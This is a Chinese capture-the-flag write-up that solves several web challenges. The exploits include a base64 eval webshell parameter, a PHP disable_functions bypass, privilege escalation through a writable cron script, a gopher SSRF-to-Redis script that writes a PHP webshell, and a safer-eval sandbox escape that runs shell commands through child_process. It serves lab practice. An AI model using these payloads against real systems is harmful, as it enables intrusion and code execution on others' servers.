base64加密一下可以直接RCE:
?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==测试发现tmp目录是可以写东西。但是直接读flag是没法读得。但是发现有readflag这个程序在根目录,但是这里把执行系统命令的函数都给禁了,这里要bypass 一下disable function.
直接exp一把梭:
https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
exp上传到/var/tmp/3.txt,直接包含执行就行了。
http://ebd8d9e8-ee16-4153-8396-b65d3b3b95ac.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a=var_dump(include('../../tmp/3.txt'));echo pwn(“echo
/readflag> /var/tmp/a.txt”);
老八小超市儿
直接网上搜shopX0 getshell http://www.nctry.com/1660.html
那道shell之后呢,发现根目录下的flag是假的,还有个hint。不知道这个hint有啥用,但是在auto.sh有一个很明显的地方
#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done这里应该设定了定时任务每60秒执行一次这个脚本,而且这个makeflaghint.py 脚本我们有权限修改。我们直接修改脚本就能读到/root/flag。
f = open('/root/flag','r')
f2 = open('/666.txt','w')
flag = f.read()
f2.write(flag)
f.close()
f2.close()EZ三剑客-EzWeb
这道题和安恒还是广东强网某道题基本一样。也是SSRF打Redis.
SSRF对内网IP进行探测然后对端口探测发现是Redis,然后EXP一把梭。
import urllib
import urllib.parse
protocol="gopher://"
ip="173.138.94.11"
port="6379"
shell='\n\n<?php eval($_GET["cmd"]);?>\n\n'
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.parse.quote(redis_format(x))
print(payload)gopher://173.138.94.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A最后读flag需要绕一下空格。
cve版签到
?url=http://127.0.0.123%00.ctfhub.comEZ三剑客-EzNode
const express = require('express');
const bodyParser = require('body-parser');
const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库
const fs = require('fs');
const app = express();
app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());
// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
if (req.path === '/eval') {
let delay = 60 * 1000;
console.log(delay);
if (Number.isInteger(parseInt(req.query.delay))) {
delay = Math.max(delay, parseInt(req.query.delay));
}
const t = setTimeout(() => next(), delay);
// 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
setTimeout(() => {
clearTimeout(t);
console.log('timeout');
try {
res.send('Timeout!');
} catch (e) {
}
}, 1000);
} else {
next();
}
});
app.post('/eval', function (req, res) {
let response = '';
if (req.body.e) {
try {
response = saferEval(req.body.e);
} catch (e) {
response = 'Wrong Wrong Wrong!!!!';
}
}
res.send(String(response));
});
// 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
app.get('/source', function (req, res) {
res.set('Content-Type', 'text/javascript;charset=utf-8');
res.send(fs.readFileSync('./index.js'));
});
// 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
app.get('/version', function (req, res) {
res.set('Content-Type', 'text/json;charset=utf-8');
res.send(fs.readFileSync('./package.json'));
});
app.get('/', function (req, res) {
res.set('Content-Type', 'text/html;charset=utf-8');
res.send(fs.readFileSync('./index.html'))
})
app.listen(80, '0.0.0.0', () => {
console.log('Start listening')
});小trick
setTimeout ,整数溢出,Infinity或者 ⼤于 2147483647
setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();